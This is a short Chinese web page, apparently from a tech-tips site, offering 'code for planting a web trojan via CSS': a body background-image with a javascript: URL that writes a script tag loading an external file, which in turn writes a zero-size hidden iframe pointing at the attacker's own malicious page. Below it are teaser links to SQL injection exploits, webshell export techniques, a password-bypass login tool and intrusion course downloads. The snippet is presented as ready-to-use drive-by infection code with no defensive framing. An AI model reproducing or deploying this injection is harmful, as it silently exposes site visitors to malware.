利用css实现挂马的代码

所属分类：实用技巧 / 安全教程阅读数： 1145

收藏 0赞 0分享

body {
background-image: url('javascript:document.write(”<script src=https://www.jb51.net/9xiao.js></script>”)')
}

9xiao.js内容是 document.write(”<iframe src=你的网马 width=0 height=0></iframe>”)

更多精彩内容其他人还在看

不用xp_cmdshell照样执行命令

删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell 利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了主要是由于Jet允许调用VBA的shell()函

收藏 0赞 0分享

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道，在MySQL中，无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据，因为MySQL里最多就是用union联合查询。

收藏 0赞 0分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞，漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题，我想这个漏洞很多人都找到了，不过这个漏洞的利用有个地方还是可以说说的，可以直接得到shell：

收藏 0赞 0分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。

收藏 0赞 0分享

dvbbs 8.2 SQL Injection注射漏洞分析

利用方式:一个典型的sql注射漏洞,按照公告里说的用

收藏 0赞 0分享

整理比较全的Access SQL注入参考

不知谁整理的access sql注入资料比较全

收藏 0赞 0分享

SQL Injection with MySQL 注入分析

本文作者：angel文章性质：原创　国内能看到php+Mysql注入的文章可能比较少，但是如果关注各种WEB程序的漏洞，就可以发现，其实这些漏洞的文章其实就是一个例子。

收藏 0赞 0分享

入侵ASP.net网站的经验附利用代码

爱好入侵的可以用下面的方法，做网站的朋友就需要了解下面的asp.net的利用代码，最好来测试下

收藏 0赞 0分享

黑鹰VIP教程-脚本入侵班全部提供下载

爱好脚本的朋友有福了，脚本入侵班资料下载

收藏 0赞 0分享

非常不错的脚本入侵基础知识总结第1/2页

简单的说来，webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。

收藏 0赞 0分享

利用css实现挂马的代码

不用xp_cmdshell照样执行命令

MySQL注入中导出字段内容的研究通过注入导出WebShell

Dedecms getip()的漏洞利用代码

NtGodMode.exe任意密码登录windows系统帐号下载

dvbbs 8.2 SQL Injection注射漏洞分析

整理比较全的Access SQL注入参考

SQL Injection with MySQL 注入分析

入侵ASP.net网站的经验附利用代码

黑鹰VIP教程-脚本入侵班全部提供下载

非常不错的脚本入侵基础知识总结第1/2页

网络赚钱

站长故事